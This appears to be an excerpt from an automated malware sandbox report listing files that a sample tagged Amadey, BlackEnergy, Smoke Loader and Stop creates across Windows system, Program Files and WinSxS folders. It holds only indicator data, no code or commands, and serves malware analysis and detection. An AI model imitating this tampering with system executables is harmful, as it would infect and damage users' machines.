File created C:\Windows\SysWOW64\cleanmgr.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\DevicePairingWizard.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\eudcedit.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\forfiles.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\PhotoScreensaver.scr C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\setupugc.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\timeout.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\eventvwr.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\PING.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\replace.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\srdelayed.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\user.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\WerFault.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\cmmon32.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\tar.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\odbcconf.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\relog.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Media Player\wmpconfig.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\wordicon.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Windows Media Player\wmplayer.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\pwahelper.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\identity_helper.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdateBroker.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\java.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\osmadminicon.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\elevation_service.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\klist.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\notification_click_helper.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\chrmstp.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.0.2.0_x64__8wekyb3d8bbwe\StickyNotesStub.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdateSetup.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\dotnet\dotnet.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\msoev.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\PPTICO.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Windows Media Player\wmlaunch.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdateSetup.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedge_pwa_launcher.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\jar.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\rmid.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Mozilla Firefox\private_browsing.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdate.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\ShapeCollector.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\jjs.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\visicon.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\notification_click_helper.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\msedge.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\accicons.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Windows Mail\wabmig.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Windows Media Player\wmlaunch.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\xjc.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\extcheck.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\7-Zip\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\GameBar.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Installer\setup.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedge_proxy.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Windows Media Player\wmplayer.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\WinSxS\amd64_microsoft-windows-a..screencontentserver_31bf3856ad364e35_10.0.22000.1_none_5d8b0964af4f5e05\LockScreenContentServer.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-com-dtc-tracing_31bf3856ad364e35_10.0.22000.1_none_6e22e868f79867b0\msdtcvtr.bat_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-ie-setup-support_31bf3856ad364e35_11.0.22000.348_none_04e0603a0d245e07\ie4uinit.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-security-spp-extcom_31bf3856ad364e35_10.0.22000.318_none_065139dac533d14e\f\SppExtComObj.Exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-update-usoclient_31bf3856ad364e35_10.0.22000.469_none_aa2bb1f81a06280c\r\UsoClient.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-winrsplugins_31bf3856ad364e35_10.0.22000.1_none_6c7a140d3670631f\winrs.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-msaudittools_31bf3856ad364e35_10.0.22000.1_none_781d59aef5ebc75f\auditpol.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_f927204bf41f3d61\f\quickassist.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-a..nagement-appvclient_31bf3856ad364e35_10.0.22000.376_none_c7a79de54d7799ec\f\SyncAppvPublishingServer.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-e..-mdmdiagnosticstool_31bf3856ad364e35_10.0.22000.1_none_b5447a0b77a5213f\MdmDiagnosticsTool.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.22000.120_none_64d060998298410d\r\FileExplorer.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_openssh-common-components-onecore_31bf3856ad364e35_10.0.22000.1_none_12ea1a72b4886bec\scp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\RMActivate.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-displayswitch_31bf3856ad364e35_10.0.22000.1_none_43054e9f294487ea\DisplaySwitch.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-d..-japanese-utilities_31bf3856ad364e35_10.0.22000.1_none_4dc986ddab447f27\IMJPUEX.EXE_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\r\WerFaultSecure.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\x86_aspnet_regbrowsers_b03f5f7f11d50a3a_10.0.22000.1_none_a631d85ed7b16283\aspnet_regbrowsers.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-a..perience-ait-static_31bf3856ad364e35_10.0.22000.1_none_872834aeb30e11cf\aitstatic.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-s..or-native-serverbox_31bf3856ad364e35_10.0.22000.120_none_6b23f06ce93f4f52\f\RMActivate_ssp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\r\audit.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\x86_netfx4-aspnet_wp_exe_b03f5f7f11d50a3a_4.0.15806.256_none_4e9ea93e588a5995\aspnet_wp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-wifinetworkmanager_31bf3856ad364e35_10.0.22000.37_none_4ebd7bd997a97fcb\r\wifitask.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-findstr_31bf3856ad364e35_10.0.22000.1_none_87c7d35a92de7cef\findstr.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-ftp_31bf3856ad364e35_10.0.22000.1_none_0d83a5e891b3d321\ftp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-sharedfoldersui_31bf3856ad364e35_10.0.22000.1_none_18b57cd06ab48849\shrpubw.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_networking-mpssvc-netsh_31bf3856ad364e35_10.0.22000.434_none_b4a3a74a80427a96\r\CheckNetIsolation.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-aarsvc_31bf3856ad364e35_10.0.22000.1_none_b9334c2faa2133a2\agentactivationruntimestarter.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_6b2d7072c225a87c\r\WerFault.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-gdi_31bf3856ad364e35_10.0.22000.132_none_a52f79fedfba2bb3\fontdrvhost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-smss-minwin_31bf3856ad364e35_10.0.22000.1_none_d4a473e8ed9480cf\smss.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-x..jectdialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_f698302c22284569\r\XGpuEjectDialog.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\f\runas.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-spp-extcom_31bf3856ad364e35_10.0.22000.318_none_065139dac533d14e\f\SppExtComObj.Exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFaultSecure.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
